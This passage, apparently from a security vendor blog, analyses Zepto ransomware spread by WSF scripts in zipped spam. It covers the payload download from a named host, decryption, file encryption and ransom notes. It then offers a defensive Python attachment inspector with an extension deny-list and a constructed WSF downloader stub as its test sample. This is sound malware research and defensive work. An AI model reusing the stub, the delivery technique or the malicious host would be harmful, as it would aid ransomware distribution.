Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.


It shows that the script created two files and made an HTTP connection to mercumaya.net.

Let’s look at the two files in the Temp folder.

This is the binary view of the UL43Fok40ii file (screenshot).

This is the UL43Fok40ii.exe file: a complete PE file (screenshot).

The two files differ by only 4 bytes in size (208,008 bytes versus 208,004 bytes), which suggests that the file without the .exe extension was decrypted to produce the PE executable. The WSF script then ran the executable with the argument “321”.


 

Expanding the network connections (screenshots):

With the com.my suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same file size of the encrypted file.

In short, the WSF file run by WScript.exe downloaded a Windows PE file, decrypted it and executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.


  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe


  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.


  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.

ThreatAnalyzer displays the raw data in hexadecimal form (screenshot); a partially converted version of the raw data is shown in a second screenshot.

 

This malware also renamed a lot of files. This is the encryption behavior: each file is encrypted and renamed to a GUID-style filename with a “.zepto” suffix.

When searching for files to encrypt, it targets the phone book file first, before traversing the drive from its root directory.

Some notable files were also created; the captured screenshot shows the contents of the _HELP_instructions.bmp file.

This malware sample attempts to move its running executable to a file in the Temp folder.


With Chrome set as the default browser, the malware opens the _HELP_instructions.html file that it previously created on the Desktop. It also deletes the malware copy from the Temp folder, probably as part of its clean-up phase.

Here’s what _HELP_instructions.html looks like when opened in a browser.

The processes in the call tree under Chrome.exe are most likely spawned by the browser and are not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding new ways of infiltrating businesses and government organizations alike. In this case, they used Windows Scripting Files in the hope of passing through email gateways that don’t block WSF files inside zip attachments.
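The gateway evasion described above works because many filters look at the outer attachment name (a .zip) rather than at what the archive contains. The following is an added example, editor's code rather than anything from ThreatTrack, of the inspection a mail gateway should do instead: open the zip, apply a deny-list to the member names, and also look at the member bytes, since the analysis above shows the script dropping a PE under an arbitrary name and a renamed .wsf is just as executable. The extension list and the sample archive (a small .wsf downloader stub, a benign text file and a minimal PE header under a .dat name) are assumptions constructed for the example.

```python
"""Inspect a zip mail attachment the way a gateway should: by member name and member content.

Added example (editor's code, not ThreatTrack's product logic). The extension deny-list and
the sample archive are assumptions constructed for this illustration.
"""
import io
import struct
import zipfile

# Script and executable extensions that should not arrive by mail, zipped or not.
BLOCKED_EXTENSIONS = {"wsf", "js", "jse", "vbs", "vbe", "hta", "ps1", "bat", "cmd",
                      "scr", "exe", "dll", "com", "pif", "lnk"}


def is_pe(data):
    """True when the bytes carry a DOS 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def looks_like_wsf(data):
    """A WSF is XML with a <job> wrapper around one or more <script> elements."""
    head = data[:4096].lower()
    return b"<job" in head and b"<script" in head


def inspect_attachment(zip_bytes, depth=0, max_depth=2):
    """Return (member_name, reason) findings for one zip attachment, recursing into nested zips."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return [("<archive>", "not a valid zip")]
    findings = []
    for info in zf.infolist():
        name = info.filename
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in BLOCKED_EXTENSIONS:
            findings.append((name, f"blocked extension .{ext}"))
        if info.flag_bits & 0x1:
            # Encrypted members cannot be inspected; a gateway should treat that as a finding.
            findings.append((name, "encrypted member, cannot be scanned"))
            continue
        data = zf.read(name)
        if is_pe(data):
            findings.append((name, "PE executable regardless of extension"))
        elif looks_like_wsf(data):
            findings.append((name, "WSF script content"))
        if ext == "zip" and depth < max_depth:
            findings += [(f"{name}/{inner}", why)
                         for inner, why in inspect_attachment(data, depth + 1)]
    return findings


def build_sample_zip():
    """Constructed sample mimicking the spam: a .wsf inside a zip, a benign text file,
    and a PE header hiding under a harmless-looking extension."""
    wsf = (b'<job id="run"><script language="JScript">'
           b'var x = new ActiveXObject("MSXML2.XMLHTTP");</script></job>')
    pe_stub = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_2016.wsf", wsf)
        zf.writestr("readme.txt", b"nothing to see here")
        zf.writestr("update.dat", pe_stub)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in inspect_attachment(build_sample_zip()):
        print(f"{member}: {reason}")
```

On the constructed archive the inspector flags the .wsf twice (by name and by content) and the .dat member as a PE, while the text file passes. The encrypted-member branch matters in practice: password-protected zips with the password in the mail body are a common way around content inspection, and a gateway that silently skips such members has the same blind spot as one that never opened the zip.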

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.